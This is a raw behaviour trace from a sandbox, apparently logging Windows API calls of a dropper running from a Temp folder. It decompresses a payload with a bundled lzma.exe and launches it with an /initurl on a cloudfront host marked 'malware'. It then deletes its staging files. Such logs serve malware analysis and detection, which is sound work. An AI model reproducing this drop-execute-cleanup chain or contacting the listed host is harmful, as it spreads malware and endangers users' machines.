hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#338550000
CreateFile
hName=xahop2onl6xdgd
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#338550000
CreateFile
hName=xahop2onl6xdgd
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#350250000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#350250000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#350780000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#350800000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#350800000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
Return=1
#350850000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#350850000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#352320000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#351300000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCAL
Return=1
#351290000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\xahop2onl6xdgd" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe"
Return=1
#351290000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\xahop2onl6xdgd" "C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe"
Return=1
#353780000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
Return=1
#353780000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns7.tmp
Return=1
#354040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
Return=1
#354040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
Return=1
#354170000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
Return=1
#354170000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
Return=1
#354300000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\xahop2onl6xdgd
Return=1
#354300000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\xahop2onl6xdgd
Return=1
#356330000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#355110000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe" /initurl http://d3hb4w989juen.cloudfront.net/init/malware/:uid:? /aff
Return=1
#355100000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe" /initurl http://d3hb4w989juen.cloudfront.net/init/malware/:uid:? /affid "-" /id "0" /name " " /uniqid malware /uuid stance(s) Available. /biosserial  /biosversion  /csname stance(s) Available.
Return=1
#355100000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe" /initurl http://d3hb4w989juen.cloudfront.net/init/malware/:uid:? /affid "-" /id "0" /name " " /uniqid malware /uuid stance(s) Available. /biosserial  /biosversion  /csname stance(s) Available.
Return=1
#357760000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe
Return=0
#357760000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\biSetup21620.exe
Return=0
#358000000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\DcryptDll.dll
Return=1
#358000000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\DcryptDll.dll
Return=1
#358120000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe
Return=1
#358120000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe
Return=1
#358200000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
Return=1
#358200000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
Return=1
#358670000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
Return=1
#358660000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
Return=1
#358720000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\TempWmicBatchFile.bat
Return=1
#358720000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\TempWmicBatchFile.bat
Return=1
#359740000
ExitProcess
